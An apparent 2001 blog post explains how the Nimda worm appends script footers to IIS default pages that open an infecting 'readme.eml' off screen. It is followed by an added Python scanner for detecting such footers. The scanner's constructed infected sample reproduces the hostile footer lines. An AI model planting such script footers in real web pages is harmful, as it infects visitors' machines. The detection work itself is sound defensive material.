Slug: nimda-web-page-exploit-details Date: 2001-09-20 Title: Nimda web page exploit details layout: post

Ok, I found an infected site. (I notified the webmaster, who was already aware of the situation. The site is now down.) Anyway, here's the skinny:

Nimda presumably uses IIS's ability to add footers to HTML documents. Once it infects a server running IIS, it appears to add two new lines to the default document ("/", default.[asp,htm]), after the original <html>…</html> element. Each line is another <html> element containing a single <script> tag. The script opens a new window at coordinates 6000,6000 (well off the screen). The "src" attribute points to the virus file, "readme.eml". If IE is reading the page, it will probably try to open the .eml file (a saved email from Outlook) in the default viewer, Outlook. Doing so will run the virus, and the host will now be infected. Naaaaaasty.
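As an added example (not code from this post), here is a small defensive scanner for the pattern described above: script blocks appended after a page's closing </html> that open an .eml file in a window positioned off screen. The infected sample is a constructed approximation of what the post describes, not the actual virus footer, and the scanner checks both a "src" attribute and a window.open() argument as the target.

```python
import re

# Constructed sample: a normal document followed by two appended lines, each an
# <html> wrapper around a <script> tag, as the post describes.
SAMPLE_INFECTED = """<html>
<head><title>Welcome</title></head>
<body><h1>Example Corp</h1></body>
</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
"""

# Constructed clean sample: a legitimate script inside the document body.
SAMPLE_CLEAN = """<html>
<head><title>Welcome</title></head>
<body><h1>Example Corp</h1><script src="/js/app.js"></script></body>
</html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# A quoted target handed to window.open(...) or given as a src attribute.
TARGET_RE = re.compile(r"""(?:window\.open\s*\(\s*|src\s*=\s*)["']([^"']+)["']""", re.I)
COORD_RE = re.compile(r"\b(top|left)\s*=\s*(\d+)", re.I)

def trailing_content(html):
    """Return everything after the document's first </html>: the footer region."""
    m = re.search(r"</html\s*>", html, re.I)
    return "" if m is None else html[m.end():]

def find_appended_scripts(html):
    """Describe each <script> block that sits after the closing </html>."""
    findings = []
    for m in SCRIPT_RE.finditer(trailing_content(html)):
        block = m.group(0)
        targets = TARGET_RE.findall(block)
        coords = {k.lower(): int(v) for k, v in COORD_RE.findall(block)}
        findings.append({
            "targets": targets,
            "references_eml": any(t.lower().endswith(".eml") for t in targets),
            # 6000 px on either axis places the window beyond any screen of the era.
            "offscreen": any(v >= 6000 for v in coords.values()),
        })
    return findings

def is_nimda_like(html):
    """True when an appended script both targets an .eml file and hides its window."""
    return any(f["references_eml"] and f["offscreen"] for f in find_appended_scripts(html))
```

Run it over each served default document (default.asp, default.htm) on a suspect IIS host; any hit on is_nimda_like is worth a closer look at the footer configuration.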